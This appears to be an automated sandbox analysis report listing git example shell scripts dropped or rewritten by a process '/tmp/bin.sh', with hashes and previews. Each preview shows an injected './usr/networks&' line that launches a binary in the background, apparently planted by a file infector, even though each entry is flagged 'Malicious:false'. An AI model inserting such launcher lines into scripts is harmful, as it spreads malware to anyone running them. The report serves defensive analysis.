                                                                                                    Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                    /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4825
                                                                                                    Entropy (8bit):5.113528532566079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                    MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                    SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                    SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                    SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                    /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11759
                                                                                                    Entropy (8bit):5.2205279036587235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                    MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                    SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                    SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                    SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                    /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13843
                                                                                                    Entropy (8bit):5.402105827507175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                    MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                    SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                    SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                    SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                    /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5954
                                                                                                    Entropy (8bit):5.053117199381536
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                    MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                    SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                    SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                    SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                    /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):4.0161977906092705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                    MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                    SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                    SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                    SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):234
                                                                                                    Entropy (8bit):4.9965164312586925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                    MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                    SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                    SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                    SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2436
                                                                                                    Entropy (8bit):5.153713997451705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                    MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                    SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                    SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                    SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                    /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):247
                                                                                                    Entropy (8bit):4.532049748049262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                    MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                    SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                    SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                    SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12742
                                                                                                    Entropy (8bit):5.053935136942481
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                    MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                    SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                    SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                    SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                    /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4349
                                                                                                    Entropy (8bit):4.9994650554848405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                    MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                    SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                    SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                    SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                    /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2499
                                                                                                    Entropy (8bit):5.168731776130111
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                    MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                    SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                    SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                    SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                    /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1947
                                                                                                    Entropy (8bit):5.193786239756587
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                    MD5:F1EDF5EE98492845561257661376A072
                                                                                                    SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                    SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                    SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                    /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2433
                                                                                                    Entropy (8bit):5.07831529192731
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                    MD5:71B42464943116BC0925788790C82720
                                                                                                    SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                    SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                    SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                    /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4385
                                                                                                    Entropy (8bit):5.300590299626365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                    MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                    SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                    SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                    SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                    /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1972
                                                                                                    Entropy (8bit):5.222096129300364
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                    MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                    SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                    SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                    SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                    /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):243
                                                                                                    Entropy (8bit):5.091025781115778
